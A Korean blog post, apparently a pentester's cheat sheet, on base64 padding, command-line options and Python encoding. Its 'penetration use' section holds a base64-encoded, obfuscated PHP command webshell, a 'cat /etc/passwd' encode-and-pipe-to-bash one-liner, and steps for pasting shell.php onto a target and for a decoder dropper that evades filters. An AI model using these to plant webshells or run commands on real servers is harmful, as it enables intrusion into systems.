base64 padding =

agnusdei·2025년 7월 25일

base64 - 인코딩/디코딩

📌 패딩(`=`)이란? → 진짜 중요

Base64는 3바이트(24비트)를 6비트씩 4개로 쪼개 문자로 인코딩함.
원본 데이터가 3바이트 단위가 아니면 6비트를 채우기 위해 = 또는 ==을 패딩 문자로 붙임.

원본 바이트 수	인코딩 후 길이	패딩
3의 배수	정확히 4n	없음
2바이트	3 + `=`	1개
1바이트	2 + `==`	2개

🔒 패딩은 데이터 정렬을 위한 것이지, 암호화나 보안 요소는 아님
🛠️ 실전에서는 일부 도구나 웹 필터 우회를 위해 패딩이 생략되기도 함
✅ base64 -d는 패딩이 없어도 자동으로 보정하여 디코딩 잘됨

# 패딩 있는 경우
echo -n "A" | base64         # → QQ==
# 패딩 없는 버전
echo -n "QQ==" | tr -d '=' | base64 -d

주요 옵션

-d, --decode : 디코딩 모드
-i, --ignore-garbage : 디코딩 시 base64 문자가 아닌 것 무시
-w, --wrap=COLS : COLS 바이트마다 줄바꿈 (기본 76, 0은 줄바꿈 없음)
-n : echo 명령어에서 사용, 마지막 개행 문자 제거 (base64 인코딩/디코딩 시 오류 방지)

기본 명령어

텍스트 변환

# text → base64
echo -n "admin:password" | base64     # YWRtaW46cGFzc3dvcmQ=
# echo -n : 마지막 개행 문자 제거 (base64 인코딩/디코딩 시 오류 방지)

# base64 → text
echo -n "YOUR_STRING_HERE" | tr -d '\n\r ' | base64 -d
# tr 파이프를 활용하여 transform, delete
echo -n "YWRtaW46cGFzc3dvcmQ=" | base64 -d  # admin:password
echo -n "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | tr -d '=' | base64 -d

파일 처리

# 파일 → base64 (줄바꿈 포함)
base64 shell.php > shell.b64

# 파일 → base64 (한 줄로)
base64 -w 0 shell.php > shell.b64

# base64 → 파일
base64 -d shell.b64 > shell.php
cat shell.b64 | base64 -d > shell.php

깨지는 경우 파이썬으로

Python

# 인코딩
python3 -c "import base64; print(base64.b64encode(b'비밀번호').decode())"

# 디코딩
python3 -c "import base64; print(base64.b64decode('67Cx66Gd67KI7Zi4').decode())"

# 파일 인코딩
python3 -c "import base64, sys; print(base64.b64encode(open(sys.argv[1], 'rb').read()).decode())" shell.php

원라이너

# 명령어 인코딩 후 실행
echo -n "cat /etc/passwd" | base64     # Y2F0IC9ldGMvcGFzc3dk
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash     # 원격지에서 실행

침투 활용

파일 전송

# 공격자 → 대상 서버
base64 -w 0 shell.php > shell.txt     # 로컬에서 인코딩
# shell.txt 내용을 복사하여 타겟 서버에 붙여넣기
base64 -d > shell.php << 'EOF'        # 타겟에서 실행
[붙여넣은 내용]
EOF

웹쉘 우회

# 기본 디코딩 웹쉘 템플릿
<?php
$data = '디코딩할문자열';
file_put_contents('shell.php', base64_decode($data));
?>

# 파일로 저장
echo "<?php
\$data = '디코딩할문자열';
file_put_contents('shell.php', base64_decode(\$data));
?>" > decode.php

# 실행
php decode.php

Basic 인증

# Basic 인증 헤더 생성
echo -n "admin:password" | base64     # YWRtaW46cGFzc3dvcmQ=
curl -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" https://target.com/

agnusdei

DevSecOps Pentest🚩

이전 포스트

host level docker postgres backup.python NCP pg_dump

다음 포스트

base64 padding =

base64 - 인코딩/디코딩

📌 패딩(=)이란? → 진짜 중요

주요 옵션

기본 명령어

텍스트 변환

파일 처리

깨지는 경우 파이썬으로

Python

원라이너

침투 활용

파일 전송

웹쉘 우회

Basic 인증

host level docker postgres backup.python NCP pg_dump

\n\r

0개의 댓글

📌 패딩(`=`)이란? → 진짜 중요